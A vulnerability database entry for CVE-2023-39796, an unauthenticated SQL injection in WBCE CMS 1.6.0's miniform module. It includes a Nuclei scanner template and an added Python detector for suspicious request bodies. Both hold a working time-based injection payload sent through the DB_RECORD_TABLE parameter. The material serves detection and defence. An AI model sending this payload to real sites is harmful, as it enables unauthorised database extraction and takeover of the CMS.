WBCE 1.6.0 - SQL Injection

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

WBCE 1.6.0 - SQL Injection vulnerability in miniform module, allowing unauthenticated access to the database and takeover.

Related

Reporter | Title | Published | Family
0day.today | WBCE 1.6.0 - Unauthenticated SQL injection Vulnerability | 12 Apr 2024 00:00 | zdt
ATTACKERKB | CVE-2023-39796 | 10 Nov 2023 06:15 | attackerkb
Circl | CVE-2023-39796 | 23 Nov 2023 14:03 | circl
CNNVD | WBCE CMS Security Vulnerability | 10 Nov 2023 00:00 | cnnvd
CVE | CVE-2023-39796 | 10 Nov 2023 00:00 | cve
Cvelist | CVE-2023-39796 | 10 Nov 2023 00:00 | cvelist
Exploit DB | WBCE 1.6.0 - Unauthenticated SQL injection | 12 Apr 2024 00:00 | exploitdb
NVD | CVE-2023-39796 | 10 Nov 2023 06:15 | nvd
Packet Storm | WBCE 1.6.0 SQL Injection | 15 Apr 2024 00:00 | packetstorm
Prion | Sql injection | 10 Nov 2023 06:15 | prion

id: CVE-2023-39796

info:
  name: WBCE 1.6.0 - SQL Injection
  author: youngpope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection through the DB_RECORD_TABLE parameter in the miniform module to extract the complete CMS database and takeover the WBCE installation.
  remediation: Fixed in version 1.6.1
  reference:
    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
    - https://pastebin.com/PBw5AvGp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
    cwe-id: CWE-89
    epss-score: 0.06096
    epss-percentile: 0.92547
    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wbce
    product: wbce_cms
  tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /modules/miniform/ajax_delete_message.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_1 == 200'
          - 'contains(body, "Record deleted successfully!")'
        condition: and
# digest: 490a00463044022047c1fd51878cfca833744cc787630264566058f9fa2f7173369993b9b854bd20022006377688971390628c24cebd70447c580a9ca1ed2a6a7f04d0f69d0ca22df902:922c64590222798bb761d5b6d8e72950
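
A defender-side check for the request shape this template sends, as an added example that is not part of the template or of WBCE: it flags POSTs to the miniform endpoint whose `DB_RECORD_TABLE` or `DB_COLUMN` value is not a plain SQL identifier. The function names, the identifier pattern and the sample records are assumptions made for illustration; the first sample body is the one from the template above.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter names are taken from the template above.
ENDPOINT = "/modules/miniform/ajax_delete_message.php"
IDENT_PARAMS = ("DB_RECORD_TABLE", "DB_COLUMN")
# Assumption: legitimate table/column names are letters, digits and underscores.
SAFE_IDENT = re.compile(r"[A-Za-z0-9_]+")


def inspect_request(method, path, body):
    """Return (param, decoded_value) pairs that are not plain identifiers."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qs URL-decodes values, so '+' and %3d are seen as ' ' and '='.
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for name in IDENT_PARAMS:
        for value in params.get(name, []):
            # An empty value is also flagged: it is never a valid identifier.
            if not SAFE_IDENT.fullmatch(value):
                findings.append((name, value))
    return findings


def scan(records):
    """Return the (source, findings) pairs for every flagged record."""
    flagged = []
    for source, method, path, body in records:
        findings = inspect_request(method, path, body)
        if findings:
            flagged.append((source, findings))
    return flagged


# Constructed sample records: (source address, method, path, request body).
SAMPLE_RECORDS = [
    ("198.51.100.7", "POST", ENDPOINT,
     "action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+"
     "(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1"
     "&DB_COLUMN=message_id&MODULE=&purpose=delete_record"),
    ("192.0.2.10", "POST", ENDPOINT,
     "action=delete&DB_RECORD_TABLE=miniform_data&iRecordID=1"
     "&DB_COLUMN=message_id&MODULE=&purpose=delete_record"),
    ("192.0.2.10", "GET", "/index.php", ""),
]

if __name__ == "__main__":
    for source, findings in scan(SAMPLE_RECORDS):
        print(source, findings)
```

The check needs the request body, so it belongs where bodies are visible (a WAF, reverse proxy or audit log), not in a plain access log.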

Scores (current as of 04 Feb 2026 07:00):
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 9.8
EPSS: 0.06096